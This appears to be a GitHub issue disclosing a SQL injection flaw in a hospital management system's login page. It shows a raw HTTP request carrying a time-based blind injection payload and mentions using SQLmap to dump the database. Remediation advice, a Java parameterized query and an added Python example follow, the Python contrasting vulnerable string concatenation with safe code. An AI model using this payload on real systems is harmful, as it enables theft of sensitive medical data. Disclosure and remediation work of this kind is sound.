
Vulnerability/BUG - SQL Injection on login page. #1

Open
@shubhamvpandey

Description

Hi
I found a SQL injection vulnerability in your hospital management system.

Login page request -
POST /hospital-management-system-php-mysql-master/index.php HTTP/1.1
Host: 192.168.1.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Origin: http://192.168.1.8
Connection: close
Referer: http://192.168.1.8/hospital-management-system-php-mysql-master/index.php
Cookie: PHPSESSID=svu2e3i3pe2cuvc8medpnjdp0f
Upgrade-Insecure-Requests: 1

lemail=test2@test.com'%2b(select*from(select(sleep(20)))a)%2b'&lpassword=1234

The above query will only make the database sleep for 20 seconds, but using SQLmap a bad user can dump the database, as shown in the image.
[image: sql injection project management]

Control -
User inputs consumed by the application should be sanitized based on the data type and data sets. For example, user input for age should only be allowed to contain numbers. A blacklist approach, where certain characters and keywords are sanitized, is not recommended.

Remediation -
To prevent this, follow these steps:
a) Validate all input data against a whitelist

b) Use parameterized queries
import java.sql.*;

// The '?' placeholder is bound separately from the SQL text, so userId is never parsed as SQL.
String selectStatement = "SELECT * FROM User WHERE userId = ? ";
PreparedStatement prepStmt = con.prepareStatement(selectStatement);
prepStmt.setString(1, userId);
ResultSet rs = prepStmt.executeQuery();
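Added example (not code from the report or from the hospital management system): both remediation steps applied to a login check like the reported one, using the issue's own payload as input. It assumes an in-memory SQLite table standing in for the MySQL users table, so the injected sleep() surfaces as a database error rather than a 20-second delay.

```python
import re
import sqlite3

# Constructed stand-in for the application's user table (assumption: the real
# app uses MySQL; sqlite3 is used here only so the example runs offline).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (email TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (?, ?)", ("test2@test.com", "secret"))
    return con

# The lemail value from the report, URL-decoded (%2b -> '+').
PAYLOAD = "test2@test.com'+(select*from(select(sleep(20)))a)+'"

def login_vulnerable(con, email, password):
    # String concatenation: the quote in the payload closes the literal and the
    # remainder is parsed as SQL. SQLite has no sleep(), so the injected
    # subquery shows up as an OperationalError instead of a delay.
    sql = ("SELECT email FROM users WHERE email = '" + email
           + "' AND password = '" + password + "'")
    return con.execute(sql).fetchone()

# Step (a): whitelist validation. Only e-mail-shaped input is accepted; quotes
# and parentheses never pass.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

def login_safe(con, email, password):
    if not EMAIL_RE.fullmatch(email):
        return None
    # Step (b): parameterized query. The driver binds the values separately
    # from the statement text, so input can never change the query structure.
    sql = "SELECT email FROM users WHERE email = ? AND password = ?"
    return con.execute(sql, (email, password)).fetchone()

def payload_reached_sql_parser(con):
    # True when the injected text was executed as SQL (the vulnerable path).
    try:
        login_vulnerable(con, PAYLOAD, "1234")
    except sqlite3.OperationalError:
        return True
    return False
```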
